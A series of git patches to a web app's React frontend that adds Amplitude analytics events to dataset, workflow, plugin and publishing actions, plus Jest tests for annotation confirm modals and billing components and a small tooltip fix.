From d942adf3b2d701b6458965c070cb4f65042e7ca0 Mon Sep 17 00:00:00 2001 From: Coding On Star <447357187@qq.com> Date: Mon, 15 Dec 2025 15:25:10 +0800 Subject: [PATCH 01/27] feat: Enhance Amplitude tracking across various components (#29662) Co-authored-by: CodingOnStar --- .../components/app/app-publisher/index.tsx | 4 +- .../base/amplitude/AmplitudeProvider.tsx | 42 ++++++++++++++++++- .../create-from-pipeline/list/create-card.tsx | 4 ++ .../list/template-card/index.tsx | 8 +++- .../empty-dataset-creation-modal/index.tsx | 5 +++ .../datasets/create/step-two/index.tsx | 5 +++ .../documents/create-from-pipeline/index.tsx | 5 +++ .../connector/index.tsx | 5 +++ .../plugin-detail-panel/detail-header.tsx | 4 +- .../panel/test-run/preparation/index.tsx | 2 + .../rag-pipeline-header/publisher/popup.tsx | 2 + .../workflow-app/hooks/use-workflow-run.ts | 2 + .../block-selector/tool/action-item.tsx | 5 +++ .../components/workflow/header/run-mode.tsx | 6 +++ .../nodes/_base/hooks/use-one-step-run.ts | 2 + 15 files changed, 96 insertions(+), 5 deletions(-) diff --git a/web/app/components/app/app-publisher/index.tsx b/web/app/components/app/app-publisher/index.tsx index 2dc45e1337..5aea337f85 100644 --- a/web/app/components/app/app-publisher/index.tsx +++ b/web/app/components/app/app-publisher/index.tsx @@ -51,6 +51,7 @@ import { AppModeEnum } from '@/types/app' import type { PublishWorkflowParams } from '@/types/workflow' import { basePath } from '@/utils/var' import UpgradeBtn from '@/app/components/billing/upgrade-btn' +import { trackEvent } from '@/app/components/base/amplitude' const ACCESS_MODE_MAP: Record = { [AccessMode.ORGANIZATION]: { @@ -189,11 +190,12 @@ const AppPublisher = ({ try { await onPublish?.(params) setPublished(true) + trackEvent('app_published_time', { action_mode: 'app', app_id: appDetail?.id, app_name: appDetail?.name }) } catch { setPublished(false) } - }, [onPublish]) + }, [appDetail, onPublish]) const handleRestore = useCallback(async () => { try { diff --git a/web/app/components/base/amplitude/AmplitudeProvider.tsx b/web/app/components/base/amplitude/AmplitudeProvider.tsx index 424475aba7..6c378ab64f 100644 --- a/web/app/components/base/amplitude/AmplitudeProvider.tsx +++ b/web/app/components/base/amplitude/AmplitudeProvider.tsx @@ -15,6 +15,43 @@ export const isAmplitudeEnabled = () => { return IS_CLOUD_EDITION && !!AMPLITUDE_API_KEY } +// Map URL pathname to English page name for consistent Amplitude tracking +const getEnglishPageName = (pathname: string): string => { + // Remove leading slash and get the first segment + const segments = pathname.replace(/^\//, '').split('/') + const firstSegment = segments[0] || 'home' + + const pageNameMap: Record = { + '': 'Home', + 'apps': 'Studio', + 'datasets': 'Knowledge', + 'explore': 'Explore', + 'tools': 'Tools', + 'account': 'Account', + 'signin': 'Sign In', + 'signup': 'Sign Up', + } + + return pageNameMap[firstSegment] || firstSegment.charAt(0).toUpperCase() + firstSegment.slice(1) +} + +// Enrichment plugin to override page title with English name for page view events +const pageNameEnrichmentPlugin = (): amplitude.Types.EnrichmentPlugin => { + return { + name: 'page-name-enrichment', + type: 'enrichment', + setup: async () => undefined, + execute: async (event: amplitude.Types.Event) => { + // Only modify page view events + if (event.event_type === '[Amplitude] Page Viewed' && event.event_properties) { + const pathname = typeof window !== 'undefined' ? window.location.pathname : '' + event.event_properties['[Amplitude] Page Title'] = getEnglishPageName(pathname) + } + return event + }, + } +} + const AmplitudeProvider: FC = ({ sessionReplaySampleRate = 1, }) => { @@ -31,10 +68,11 @@ const AmplitudeProvider: FC = ({ formInteractions: true, fileDownloads: true, }, - // Enable debug logs in development environment - logLevel: amplitude.Types.LogLevel.Warn, }) + // Add page name enrichment plugin to override page title with English name + amplitude.add(pageNameEnrichmentPlugin()) + // Add Session Replay plugin const sessionReplay = sessionReplayPlugin({ sampleRate: sessionReplaySampleRate, diff --git a/web/app/components/datasets/create-from-pipeline/list/create-card.tsx b/web/app/components/datasets/create-from-pipeline/list/create-card.tsx index 43c6da0dfc..12008b2d4d 100644 --- a/web/app/components/datasets/create-from-pipeline/list/create-card.tsx +++ b/web/app/components/datasets/create-from-pipeline/list/create-card.tsx @@ -5,6 +5,7 @@ import { useCreatePipelineDataset } from '@/service/knowledge/use-create-dataset import { useInvalidDatasetList } from '@/service/knowledge/use-dataset' import Toast from '@/app/components/base/toast' import { useRouter } from 'next/navigation' +import { trackEvent } from '@/app/components/base/amplitude' const CreateCard = () => { const { t } = useTranslation() @@ -23,6 +24,9 @@ const CreateCard = () => { message: t('datasetPipeline.creation.successTip'), }) invalidDatasetList() + trackEvent('create_datasets_from_scratch', { + dataset_id: id, + }) push(`/datasets/${id}/pipeline`) } }, diff --git a/web/app/components/datasets/create-from-pipeline/list/template-card/index.tsx b/web/app/components/datasets/create-from-pipeline/list/template-card/index.tsx index cde3bc0e00..a2fe3d164b 100644 --- a/web/app/components/datasets/create-from-pipeline/list/template-card/index.tsx +++ b/web/app/components/datasets/create-from-pipeline/list/template-card/index.tsx @@ -19,6 +19,7 @@ import Content from './content' import Actions from './actions' import { useCreatePipelineDatasetFromCustomized } from '@/service/knowledge/use-create-dataset' import { useInvalidDatasetList } from '@/service/knowledge/use-dataset' +import { trackEvent } from '@/app/components/base/amplitude' type TemplateCardProps = { pipeline: PipelineTemplate @@ -66,6 +67,11 @@ const TemplateCard = ({ invalidDatasetList() if (newDataset.pipeline_id) await handleCheckPluginDependencies(newDataset.pipeline_id, true) + trackEvent('create_datasets_with_pipeline', { + template_name: pipeline.name, + template_id: pipeline.id, + template_type: type, + }) push(`/datasets/${newDataset.dataset_id}/pipeline`) }, onError: () => { @@ -75,7 +81,7 @@ const TemplateCard = ({ }) }, }) - }, [getPipelineTemplateInfo, createDataset, t, handleCheckPluginDependencies, push, invalidDatasetList]) + }, [getPipelineTemplateInfo, createDataset, t, handleCheckPluginDependencies, push, invalidDatasetList, pipeline.name, pipeline.id, type]) const handleShowTemplateDetails = useCallback(() => { setShowDetailModal(true) diff --git a/web/app/components/datasets/create/empty-dataset-creation-modal/index.tsx b/web/app/components/datasets/create/empty-dataset-creation-modal/index.tsx index 12b9366744..29986e4fca 100644 --- a/web/app/components/datasets/create/empty-dataset-creation-modal/index.tsx +++ b/web/app/components/datasets/create/empty-dataset-creation-modal/index.tsx @@ -12,6 +12,7 @@ import Button from '@/app/components/base/button' import { ToastContext } from '@/app/components/base/toast' import { createEmptyDataset } from '@/service/datasets' import { useInvalidDatasetList } from '@/service/knowledge/use-dataset' +import { trackEvent } from '@/app/components/base/amplitude' type IProps = { show: boolean @@ -40,6 +41,10 @@ const EmptyDatasetCreationModal = ({ try { const dataset = await createEmptyDataset({ name: inputValue }) invalidDatasetList() + trackEvent('create_empty_datasets', { + name: inputValue, + dataset_id: dataset.id, + }) onHide() router.push(`/datasets/${dataset.id}/documents`) } diff --git a/web/app/components/datasets/create/step-two/index.tsx b/web/app/components/datasets/create/step-two/index.tsx index 43be89c326..4d568e9a6c 100644 --- a/web/app/components/datasets/create/step-two/index.tsx +++ b/web/app/components/datasets/create/step-two/index.tsx @@ -64,6 +64,7 @@ import { noop } from 'lodash-es' import { useDocLink } from '@/context/i18n' import { useInvalidDatasetList } from '@/service/knowledge/use-dataset' import { checkShowMultiModalTip } from '../../settings/utils' +import { trackEvent } from '@/app/components/base/amplitude' const TextLabel: FC = (props) => { return @@ -568,6 +569,10 @@ const StepTwo = ({ if (mutateDatasetRes) mutateDatasetRes() invalidDatasetList() + trackEvent('create_datasets', { + data_source_type: dataSourceType, + indexing_technique: getIndexing_technique(), + }) onStepChange?.(+1) if (isSetting) onSave?.() diff --git a/web/app/components/datasets/documents/create-from-pipeline/index.tsx b/web/app/components/datasets/documents/create-from-pipeline/index.tsx index 79e3694da8..eb87c83489 100644 --- a/web/app/components/datasets/documents/create-from-pipeline/index.tsx +++ b/web/app/components/datasets/documents/create-from-pipeline/index.tsx @@ -40,6 +40,7 @@ import UpgradeCard from '../../create/step-one/upgrade-card' import Divider from '@/app/components/base/divider' import { useBoolean } from 'ahooks' import PlanUpgradeModal from '@/app/components/billing/plan-upgrade-modal' +import { trackEvent } from '@/app/components/base/amplitude' const CreateFormPipeline = () => { const { t } = useTranslation() @@ -343,6 +344,10 @@ const CreateFormPipeline = () => { setBatchId((res as PublishedPipelineRunResponse).batch || '') setDocuments((res as PublishedPipelineRunResponse).documents || []) handleNextStep() + trackEvent('dataset_document_added', { + data_source_type: datasourceType, + indexing_technique: 'pipeline', + }) }, }) }, [dataSourceStore, datasource, datasourceType, handleNextStep, pipelineId, runPublishedPipeline]) diff --git a/web/app/components/datasets/external-knowledge-base/connector/index.tsx b/web/app/components/datasets/external-knowledge-base/connector/index.tsx index 33f57d0b47..ec055a049f 100644 --- a/web/app/components/datasets/external-knowledge-base/connector/index.tsx +++ b/web/app/components/datasets/external-knowledge-base/connector/index.tsx @@ -6,6 +6,7 @@ import { useToastContext } from '@/app/components/base/toast' import ExternalKnowledgeBaseCreate from '@/app/components/datasets/external-knowledge-base/create' import type { CreateKnowledgeBaseReq } from '@/app/components/datasets/external-knowledge-base/create/declarations' import { createExternalKnowledgeBase } from '@/service/datasets' +import { trackEvent } from '@/app/components/base/amplitude' const ExternalKnowledgeBaseConnector = () => { const { notify } = useToastContext() @@ -18,6 +19,10 @@ const ExternalKnowledgeBaseConnector = () => { const result = await createExternalKnowledgeBase({ body: formValue }) if (result && result.id) { notify({ type: 'success', message: 'External Knowledge Base Connected Successfully' }) + trackEvent('create_external_knowledge_base', { + provider: formValue.provider, + name: formValue.name, + }) router.back() } else { throw new Error('Failed to create external knowledge base') } diff --git a/web/app/components/plugins/plugin-detail-panel/detail-header.tsx b/web/app/components/plugins/plugin-detail-panel/detail-header.tsx index 197f2e2a92..e1cd1bbcd4 100644 --- a/web/app/components/plugins/plugin-detail-panel/detail-header.tsx +++ b/web/app/components/plugins/plugin-detail-panel/detail-header.tsx @@ -44,6 +44,7 @@ import { AUTO_UPDATE_MODE } from '../reference-setting-modal/auto-update-setting import { convertUTCDaySecondsToLocalSeconds, timeOfDayToDayjs } from '../reference-setting-modal/auto-update-setting/utils' import type { PluginDetail } from '../types' import { PluginCategoryEnum, PluginSource } from '../types' +import { trackEvent } from '@/app/components/base/amplitude' const i18nPrefix = 'plugin.action' @@ -212,8 +213,9 @@ const DetailHeader = ({ refreshModelProviders() if (PluginCategoryEnum.tool.includes(category)) invalidateAllToolProviders() + trackEvent('plugin_uninstalled', { plugin_id, plugin_name: name }) } - }, [showDeleting, id, hideDeleting, hideDeleteConfirm, onUpdate, category, refreshModelProviders, invalidateAllToolProviders]) + }, [showDeleting, id, hideDeleting, hideDeleteConfirm, onUpdate, category, refreshModelProviders, invalidateAllToolProviders, plugin_id, name]) return (
diff --git a/web/app/components/rag-pipeline/components/panel/test-run/preparation/index.tsx b/web/app/components/rag-pipeline/components/panel/test-run/preparation/index.tsx index c659d8669a..8a1d33b202 100644 --- a/web/app/components/rag-pipeline/components/panel/test-run/preparation/index.tsx +++ b/web/app/components/rag-pipeline/components/panel/test-run/preparation/index.tsx @@ -21,6 +21,7 @@ import { useDataSourceStore, useDataSourceStoreWithSelector } from '@/app/compon import { useShallow } from 'zustand/react/shallow' import { useWorkflowStore } from '@/app/components/workflow/store' import StepIndicator from './step-indicator' +import { trackEvent } from '@/app/components/base/amplitude' const Preparation = () => { const { @@ -121,6 +122,7 @@ const Preparation = () => { datasource_type: datasourceType, datasource_info_list: datasourceInfoList, }) + trackEvent('pipeline_start_action_time', { action_type: 'document_processing' }) setIsPreparingDataSource?.(false) }, [dataSourceStore, datasource, datasourceType, handleRun, workflowStore]) diff --git a/web/app/components/rag-pipeline/components/rag-pipeline-header/publisher/popup.tsx b/web/app/components/rag-pipeline/components/rag-pipeline-header/publisher/popup.tsx index 42ca643cb0..52344f6278 100644 --- a/web/app/components/rag-pipeline/components/rag-pipeline-header/publisher/popup.tsx +++ b/web/app/components/rag-pipeline/components/rag-pipeline-header/publisher/popup.tsx @@ -47,6 +47,7 @@ import { useModalContextSelector } from '@/context/modal-context' import Link from 'next/link' import { useDatasetApiAccessUrl } from '@/hooks/use-api-access-url' import { useFormatTimeFromNow } from '@/hooks/use-format-time-from-now' +import { trackEvent } from '@/app/components/base/amplitude' const PUBLISH_SHORTCUT = ['ctrl', '⇧', 'P'] @@ -109,6 +110,7 @@ const Popup = () => { releaseNotes: params?.releaseNotes || '', }) setPublished(true) + trackEvent('app_published_time', { action_mode: 'pipeline', app_id: datasetId, app_name: params?.title || '' }) if (res) { notify({ type: 'success', diff --git a/web/app/components/workflow-app/hooks/use-workflow-run.ts b/web/app/components/workflow-app/hooks/use-workflow-run.ts index 6164969b3d..f051f73489 100644 --- a/web/app/components/workflow-app/hooks/use-workflow-run.ts +++ b/web/app/components/workflow-app/hooks/use-workflow-run.ts @@ -29,6 +29,7 @@ import { post } from '@/service/base' import { ContentType } from '@/service/fetch' import { TriggerType } from '@/app/components/workflow/header/test-run-menu' import { AppModeEnum } from '@/types/app' +import { trackEvent } from '@/app/components/base/amplitude' type HandleRunMode = TriggerType type HandleRunOptions = { @@ -359,6 +360,7 @@ export const useWorkflowRun = () => { if (onError) onError(params) + trackEvent('workflow_run_failed', { workflow_id: flowId, reason: params.error, node_type: params.node_type }) } const wrappedOnCompleted: IOtherOptions['onCompleted'] = async (hasError?: boolean, errorMessage?: string) => { diff --git a/web/app/components/workflow/block-selector/tool/action-item.tsx b/web/app/components/workflow/block-selector/tool/action-item.tsx index 1ca61b3039..2151beefab 100644 --- a/web/app/components/workflow/block-selector/tool/action-item.tsx +++ b/web/app/components/workflow/block-selector/tool/action-item.tsx @@ -13,6 +13,7 @@ import { useTranslation } from 'react-i18next' import useTheme from '@/hooks/use-theme' import { Theme } from '@/types/app' import { basePath } from '@/utils/var' +import { trackEvent } from '@/app/components/base/amplitude' const normalizeProviderIcon = (icon?: ToolWithProvider['icon']) => { if (!icon) @@ -102,6 +103,10 @@ const ToolItem: FC = ({ params, meta: provider.meta, }) + trackEvent('tool_selected', { + tool_name: payload.name, + plugin_id: provider.plugin_id, + }) }} >
diff --git a/web/app/components/workflow/header/run-mode.tsx b/web/app/components/workflow/header/run-mode.tsx index 7a1d444d30..bd34cf6879 100644 --- a/web/app/components/workflow/header/run-mode.tsx +++ b/web/app/components/workflow/header/run-mode.tsx @@ -12,6 +12,7 @@ import { StopCircle } from '@/app/components/base/icons/src/vender/line/mediaAnd import { useDynamicTestRunOptions } from '../hooks/use-dynamic-test-run-options' import TestRunMenu, { type TestRunMenuRef, type TriggerOption, TriggerType } from './test-run-menu' import { useToastContext } from '@/app/components/base/toast' +import { trackEvent } from '@/app/components/base/amplitude' type RunModeProps = { text?: string @@ -69,22 +70,27 @@ const RunMode = ({ if (option.type === TriggerType.UserInput) { handleWorkflowStartRunInWorkflow() + trackEvent('app_start_action_time', { action_type: 'user_input' }) } else if (option.type === TriggerType.Schedule) { handleWorkflowTriggerScheduleRunInWorkflow(option.nodeId) + trackEvent('app_start_action_time', { action_type: 'schedule' }) } else if (option.type === TriggerType.Webhook) { if (option.nodeId) handleWorkflowTriggerWebhookRunInWorkflow({ nodeId: option.nodeId }) + trackEvent('app_start_action_time', { action_type: 'webhook' }) } else if (option.type === TriggerType.Plugin) { if (option.nodeId) handleWorkflowTriggerPluginRunInWorkflow(option.nodeId) + trackEvent('app_start_action_time', { action_type: 'plugin' }) } else if (option.type === TriggerType.All) { const targetNodeIds = option.relatedNodeIds?.filter(Boolean) if (targetNodeIds && targetNodeIds.length > 0) handleWorkflowRunAllTriggersInWorkflow(targetNodeIds) + trackEvent('app_start_action_time', { action_type: 'all' }) } else { // Placeholder for trigger-specific execution logic for schedule, webhook, plugin types diff --git a/web/app/components/workflow/nodes/_base/hooks/use-one-step-run.ts b/web/app/components/workflow/nodes/_base/hooks/use-one-step-run.ts index 77d75ccc4f..dad62ae2a4 100644 --- a/web/app/components/workflow/nodes/_base/hooks/use-one-step-run.ts +++ b/web/app/components/workflow/nodes/_base/hooks/use-one-step-run.ts @@ -68,6 +68,7 @@ import { useAllMCPTools, useAllWorkflowTools, } from '@/service/use-tools' +import { trackEvent } from '@/app/components/base/amplitude' // eslint-disable-next-line ts/no-unsafe-function-type const checkValidFns: Partial> = { @@ -973,6 +974,7 @@ const useOneStepRun = ({ _singleRunningStatus: NodeRunningStatus.Failed, }, }) + trackEvent('workflow_run_failed', { workflow_id: flowId, node_id: id, reason: res.error, node_type: data?.type }) }, }, ) From a951f46a093160380aace0f7cc50497913d890db Mon Sep 17 00:00:00 2001 From: Joel Date: Mon, 15 Dec 2025 15:38:04 +0800 Subject: [PATCH 02/27] chore: tests for annotation (#29664) --- .../index.spec.tsx | 98 +++++++++++++++++++ .../index.spec.tsx | 98 +++++++++++++++++++ 2 files changed, 196 insertions(+) create mode 100644 web/app/components/app/annotation/clear-all-annotations-confirm-modal/index.spec.tsx create mode 100644 web/app/components/app/annotation/remove-annotation-confirm-modal/index.spec.tsx diff --git a/web/app/components/app/annotation/clear-all-annotations-confirm-modal/index.spec.tsx b/web/app/components/app/annotation/clear-all-annotations-confirm-modal/index.spec.tsx new file mode 100644 index 0000000000..fd6d900aa4 --- /dev/null +++ b/web/app/components/app/annotation/clear-all-annotations-confirm-modal/index.spec.tsx @@ -0,0 +1,98 @@ +import React from 'react' +import { fireEvent, render, screen } from '@testing-library/react' +import ClearAllAnnotationsConfirmModal from './index' + +jest.mock('react-i18next', () => ({ + useTranslation: () => ({ + t: (key: string) => { + const translations: Record = { + 'appAnnotation.table.header.clearAllConfirm': 'Clear all annotations?', + 'common.operation.confirm': 'Confirm', + 'common.operation.cancel': 'Cancel', + } + return translations[key] || key + }, + }), +})) + +beforeEach(() => { + jest.clearAllMocks() +}) + +describe('ClearAllAnnotationsConfirmModal', () => { + // Rendering visibility toggled by isShow flag + describe('Rendering', () => { + test('should show confirmation dialog when isShow is true', () => { + // Arrange + render( + , + ) + + // Assert + expect(screen.getByText('Clear all annotations?')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'Cancel' })).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'Confirm' })).toBeInTheDocument() + }) + + test('should not render anything when isShow is false', () => { + // Arrange + render( + , + ) + + // Assert + expect(screen.queryByText('Clear all annotations?')).not.toBeInTheDocument() + }) + }) + + // User confirms or cancels clearing annotations + describe('Interactions', () => { + test('should trigger onHide when cancel is clicked', () => { + const onHide = jest.fn() + const onConfirm = jest.fn() + // Arrange + render( + , + ) + + // Act + fireEvent.click(screen.getByRole('button', { name: 'Cancel' })) + + // Assert + expect(onHide).toHaveBeenCalledTimes(1) + expect(onConfirm).not.toHaveBeenCalled() + }) + + test('should trigger onConfirm when confirm is clicked', () => { + const onHide = jest.fn() + const onConfirm = jest.fn() + // Arrange + render( + , + ) + + // Act + fireEvent.click(screen.getByRole('button', { name: 'Confirm' })) + + // Assert + expect(onConfirm).toHaveBeenCalledTimes(1) + expect(onHide).not.toHaveBeenCalled() + }) + }) +}) diff --git a/web/app/components/app/annotation/remove-annotation-confirm-modal/index.spec.tsx b/web/app/components/app/annotation/remove-annotation-confirm-modal/index.spec.tsx new file mode 100644 index 0000000000..347ba7880b --- /dev/null +++ b/web/app/components/app/annotation/remove-annotation-confirm-modal/index.spec.tsx @@ -0,0 +1,98 @@ +import React from 'react' +import { fireEvent, render, screen } from '@testing-library/react' +import RemoveAnnotationConfirmModal from './index' + +jest.mock('react-i18next', () => ({ + useTranslation: () => ({ + t: (key: string) => { + const translations: Record = { + 'appDebug.feature.annotation.removeConfirm': 'Remove annotation?', + 'common.operation.confirm': 'Confirm', + 'common.operation.cancel': 'Cancel', + } + return translations[key] || key + }, + }), +})) + +beforeEach(() => { + jest.clearAllMocks() +}) + +describe('RemoveAnnotationConfirmModal', () => { + // Rendering behavior driven by isShow and translations + describe('Rendering', () => { + test('should display the confirm modal when visible', () => { + // Arrange + render( + , + ) + + // Assert + expect(screen.getByText('Remove annotation?')).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'Cancel' })).toBeInTheDocument() + expect(screen.getByRole('button', { name: 'Confirm' })).toBeInTheDocument() + }) + + test('should not render modal content when hidden', () => { + // Arrange + render( + , + ) + + // Assert + expect(screen.queryByText('Remove annotation?')).not.toBeInTheDocument() + }) + }) + + // User interactions with confirm and cancel buttons + describe('Interactions', () => { + test('should call onHide when cancel button is clicked', () => { + const onHide = jest.fn() + const onRemove = jest.fn() + // Arrange + render( + , + ) + + // Act + fireEvent.click(screen.getByRole('button', { name: 'Cancel' })) + + // Assert + expect(onHide).toHaveBeenCalledTimes(1) + expect(onRemove).not.toHaveBeenCalled() + }) + + test('should call onRemove when confirm button is clicked', () => { + const onHide = jest.fn() + const onRemove = jest.fn() + // Arrange + render( + , + ) + + // Act + fireEvent.click(screen.getByRole('button', { name: 'Confirm' })) + + // Assert + expect(onRemove).toHaveBeenCalledTimes(1) + expect(onHide).not.toHaveBeenCalled() + }) + }) +}) From 2b3c55d95a9c4ee562b86b6275d433988ce2abc6 Mon Sep 17 00:00:00 2001 From: Joel Date: Mon, 15 Dec 2025 16:13:14 +0800 Subject: [PATCH 03/27] chore: some billing test (#29648) Co-authored-by: gemini-code-assist[bot] <176961590+gemini-code-assist[bot]@users.noreply.github.com> Co-authored-by: Coding On Star <447357187@qq.com> --- .../billing/annotation-full/index.spec.tsx | 71 +++++++++++ .../billing/annotation-full/modal.spec.tsx | 119 ++++++++++++++++++ .../cloud-plan-item/list/item/index.spec.tsx | 52 ++++++++ .../list/item/tooltip.spec.tsx | 46 +++++++ .../cloud-plan-item/list/item/tooltip.tsx | 4 +- 5 files changed, 291 insertions(+), 1 deletion(-) create mode 100644 web/app/components/billing/annotation-full/index.spec.tsx create mode 100644 web/app/components/billing/annotation-full/modal.spec.tsx create mode 100644 web/app/components/billing/pricing/plans/cloud-plan-item/list/item/index.spec.tsx create mode 100644 web/app/components/billing/pricing/plans/cloud-plan-item/list/item/tooltip.spec.tsx diff --git a/web/app/components/billing/annotation-full/index.spec.tsx b/web/app/components/billing/annotation-full/index.spec.tsx new file mode 100644 index 0000000000..77a0940f12 --- /dev/null +++ b/web/app/components/billing/annotation-full/index.spec.tsx @@ -0,0 +1,71 @@ +import { render, screen } from '@testing-library/react' +import AnnotationFull from './index' + +jest.mock('react-i18next', () => ({ + useTranslation: () => ({ + t: (key: string) => key, + }), +})) + +let mockUsageProps: { className?: string } | null = null +jest.mock('./usage', () => ({ + __esModule: true, + default: (props: { className?: string }) => { + mockUsageProps = props + return ( +
+ usage +
+ ) + }, +})) + +let mockUpgradeBtnProps: { loc?: string } | null = null +jest.mock('../upgrade-btn', () => ({ + __esModule: true, + default: (props: { loc?: string }) => { + mockUpgradeBtnProps = props + return ( + + ) + }, +})) + +describe('AnnotationFull', () => { + beforeEach(() => { + jest.clearAllMocks() + mockUsageProps = null + mockUpgradeBtnProps = null + }) + + // Rendering marketing copy with action button + describe('Rendering', () => { + it('should render tips when rendered', () => { + // Act + render() + + // Assert + expect(screen.getByText('billing.annotatedResponse.fullTipLine1')).toBeInTheDocument() + expect(screen.getByText('billing.annotatedResponse.fullTipLine2')).toBeInTheDocument() + }) + + it('should render upgrade button when rendered', () => { + // Act + render() + + // Assert + expect(screen.getByTestId('upgrade-btn')).toBeInTheDocument() + }) + + it('should render Usage component when rendered', () => { + // Act + render() + + // Assert + const usageComponent = screen.getByTestId('usage-component') + expect(usageComponent).toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/billing/annotation-full/modal.spec.tsx b/web/app/components/billing/annotation-full/modal.spec.tsx new file mode 100644 index 0000000000..da2b2041b0 --- /dev/null +++ b/web/app/components/billing/annotation-full/modal.spec.tsx @@ -0,0 +1,119 @@ +import { fireEvent, render, screen } from '@testing-library/react' +import AnnotationFullModal from './modal' + +jest.mock('react-i18next', () => ({ + useTranslation: () => ({ + t: (key: string) => key, + }), +})) + +let mockUsageProps: { className?: string } | null = null +jest.mock('./usage', () => ({ + __esModule: true, + default: (props: { className?: string }) => { + mockUsageProps = props + return ( +
+ usage +
+ ) + }, +})) + +let mockUpgradeBtnProps: { loc?: string } | null = null +jest.mock('../upgrade-btn', () => ({ + __esModule: true, + default: (props: { loc?: string }) => { + mockUpgradeBtnProps = props + return ( + + ) + }, +})) + +type ModalSnapshot = { + isShow: boolean + closable?: boolean + className?: string +} +let mockModalProps: ModalSnapshot | null = null +jest.mock('../../base/modal', () => ({ + __esModule: true, + default: ({ isShow, children, onClose, closable, className }: { isShow: boolean; children: React.ReactNode; onClose: () => void; closable?: boolean; className?: string }) => { + mockModalProps = { + isShow, + closable, + className, + } + if (!isShow) + return null + return ( +
+ {closable && ( + + )} + {children} +
+ ) + }, +})) + +describe('AnnotationFullModal', () => { + beforeEach(() => { + jest.clearAllMocks() + mockUsageProps = null + mockUpgradeBtnProps = null + mockModalProps = null + }) + + // Rendering marketing copy inside modal + describe('Rendering', () => { + it('should display main info when visible', () => { + // Act + render() + + // Assert + expect(screen.getByText('billing.annotatedResponse.fullTipLine1')).toBeInTheDocument() + expect(screen.getByText('billing.annotatedResponse.fullTipLine2')).toBeInTheDocument() + expect(screen.getByTestId('usage-component')).toHaveAttribute('data-classname', 'mt-4') + expect(screen.getByTestId('upgrade-btn')).toHaveTextContent('annotation-create') + expect(mockUpgradeBtnProps?.loc).toBe('annotation-create') + expect(mockModalProps).toEqual(expect.objectContaining({ + isShow: true, + closable: true, + className: '!p-0', + })) + }) + }) + + // Controlling modal visibility + describe('Visibility', () => { + it('should not render content when hidden', () => { + // Act + const { container } = render() + + // Assert + expect(container).toBeEmptyDOMElement() + expect(mockModalProps).toEqual(expect.objectContaining({ isShow: false })) + }) + }) + + // Handling close interactions + describe('Close handling', () => { + it('should trigger onHide when close control is clicked', () => { + // Arrange + const onHide = jest.fn() + + // Act + render() + fireEvent.click(screen.getByTestId('mock-modal-close')) + + // Assert + expect(onHide).toHaveBeenCalledTimes(1) + }) + }) +}) diff --git a/web/app/components/billing/pricing/plans/cloud-plan-item/list/item/index.spec.tsx b/web/app/components/billing/pricing/plans/cloud-plan-item/list/item/index.spec.tsx new file mode 100644 index 0000000000..25ee1fb8c8 --- /dev/null +++ b/web/app/components/billing/pricing/plans/cloud-plan-item/list/item/index.spec.tsx @@ -0,0 +1,52 @@ +import { render, screen } from '@testing-library/react' +import Item from './index' + +describe('Item', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + // Rendering the plan item row + describe('Rendering', () => { + it('should render the provided label when tooltip is absent', () => { + // Arrange + const label = 'Monthly credits' + + // Act + const { container } = render() + + // Assert + expect(screen.getByText(label)).toBeInTheDocument() + expect(container.querySelector('.group')).toBeNull() + }) + }) + + // Toggling the optional tooltip indicator + describe('Tooltip behavior', () => { + it('should render tooltip content when tooltip text is provided', () => { + // Arrange + const label = 'Workspace seats' + const tooltip = 'Seats define how many teammates can join the workspace.' + + // Act + const { container } = render() + + // Assert + expect(screen.getByText(label)).toBeInTheDocument() + expect(screen.getByText(tooltip)).toBeInTheDocument() + expect(container.querySelector('.group')).not.toBeNull() + }) + + it('should treat an empty tooltip string as absent', () => { + // Arrange + const label = 'Vector storage' + + // Act + const { container } = render() + + // Assert + expect(screen.getByText(label)).toBeInTheDocument() + expect(container.querySelector('.group')).toBeNull() + }) + }) +}) diff --git a/web/app/components/billing/pricing/plans/cloud-plan-item/list/item/tooltip.spec.tsx b/web/app/components/billing/pricing/plans/cloud-plan-item/list/item/tooltip.spec.tsx new file mode 100644 index 0000000000..b1a6750fd7 --- /dev/null +++ b/web/app/components/billing/pricing/plans/cloud-plan-item/list/item/tooltip.spec.tsx @@ -0,0 +1,46 @@ +import { render, screen } from '@testing-library/react' +import Tooltip from './tooltip' + +describe('Tooltip', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + // Rendering the info tooltip container + describe('Rendering', () => { + it('should render the content panel when provide with text', () => { + // Arrange + const content = 'Usage resets on the first day of every month.' + + // Act + render() + + // Assert + expect(() => screen.getByText(content)).not.toThrow() + }) + }) + + describe('Icon rendering', () => { + it('should render the icon when provided with content', () => { + // Arrange + const content = 'Tooltips explain each plan detail.' + + // Act + render() + + // Assert + expect(screen.getByTestId('tooltip-icon')).toBeInTheDocument() + }) + }) + + // Handling empty strings while keeping structure consistent + describe('Edge cases', () => { + it('should render without crashing when passed empty content', () => { + // Arrange + const content = '' + + // Act and Assert + expect(() => render()).not.toThrow() + }) + }) +}) diff --git a/web/app/components/billing/pricing/plans/cloud-plan-item/list/item/tooltip.tsx b/web/app/components/billing/pricing/plans/cloud-plan-item/list/item/tooltip.tsx index 84e0282993..cf6517b292 100644 --- a/web/app/components/billing/pricing/plans/cloud-plan-item/list/item/tooltip.tsx +++ b/web/app/components/billing/pricing/plans/cloud-plan-item/list/item/tooltip.tsx @@ -8,13 +8,15 @@ type TooltipProps = { const Tooltip = ({ content, }: TooltipProps) => { + if (!content) + return null return (
{content}
- +
